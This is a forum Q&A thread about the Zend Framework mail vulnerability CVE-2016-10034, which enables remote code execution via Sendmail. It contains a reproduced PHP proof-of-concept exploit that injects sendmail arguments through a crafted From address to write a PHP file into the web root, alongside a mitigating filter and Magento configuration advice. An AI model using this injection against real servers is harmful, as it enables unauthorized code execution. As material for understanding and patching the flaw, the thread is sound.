Asked 7 years ago
14 Jan 2017
Views 1882
shabi

shabi posted

Zend Framework Security Vulnerability


Zend Framework have vulnerability which is serious and can lead to a remote code execution attack in your system if your server uses Sendmail as a mail transport agent.

is that Zend Framework vulnerability problem is serious issue . and if yes :: how can one solve Zend Framework vulnerability ?
SwiftMailer , ZendMail and PhpMailer have affected vulnerability in which the execution of remote command possible . which is good attraction for hackers. - jagdish  
Jan 14 '17 04:48
hacker inject code sendmail command by setting From Email like $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com'; - Rasi  
Jan 16 '17 03:52
Mitul Dabhi

Mitul Dabhi
answered Nov 30 '-1 00:00


solution
filter checks for the sequence \" in the local part of the email From address.

$from = $headers->get('From');
if ($from) {
    foreach ($from->getAddressList() as $address) {
        if (preg_match('/\\\"/', $address->getEmail())) {
            throw new Exception\RuntimeException("Potential code injection in From header");
        }
    }
}


check more detail here
jagdish

jagdish
answered Nov 30 '-1 00:00

following code is used to hack remote code execution by zendMailer



<?php
 
/*
 
Zend Framework < 2.4.11    Remote Code Execution (CVE-2016-10034)
zend-mail < 2.4.11 
zend-mail < 2.7.2 
 
Discovered/Coded by:
 
Dawid Golunski
https://legalhackers.com
 

Follow the feed for updates:

https://twitter.com/dawid_golunski

 
A simple PoC (working on Sendmail MTA)
 
It will inject the following parameters to sendmail command:
 
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-r]
Arg no. 4 == [attacker\]
Arg no. 5 == [-oQ/tmp/]
Arg no. 6 == [-X/var/www/cache/phpcode.php]
Arg no. 7 == ["@email.com]



which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.

The resulting file will contain the payload passed in the body of the msg:
 
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<< 
09607 <<< <?php phpinfo(); ?>
09607 <<< 
09607 <<< 
09607 <<< 
 
 
See the full advisory URL for the exploit details.
 
*/
 
 
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
 
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// encoded phpinfo() php code
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");



// ------------------
 
// mail() param injection via the vulnerability in zend-mail


chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';

Zend\Loader\AutoloaderFactory::factory(array(
        'Zend\Loader\StandardAutoloader' => array(
                'autoregister_zf' => true
        )
));

Zend\Mvc\Application::init(require 'config/application.php')->run();

$message        = new \Zend\Mail\Message();

$message->setBody($msg_body);
$message->setFrom($email_from, 'Attacker');
$message->addTo('support@localhost', 'Support');
$message->setSubject('Zend PoC');

$transport  = new \Zend\Mail\Transport\Sendmail();
$transport->send($message);

?>
Rasi

Rasi
answered Nov 30 '-1 00:00

To protect your site from this vulnerability, you should immediately check your mail sending settings. Go to the system settings used to control the “Reply to” address for emails sent from your Magento store:

Magento 1: System-> Configuration-> Advanced-> System-> Mail Sending Settings-> Set Return-Path

Magento 2: Stores-> Configuration-> Advanced-> System-> Mail Sending Settings-> Set Return-Path

“Set Return-Path” is set to “Yes,” and your server uses Sendmail, then your store is vulnerable to this exploit.
Post Answer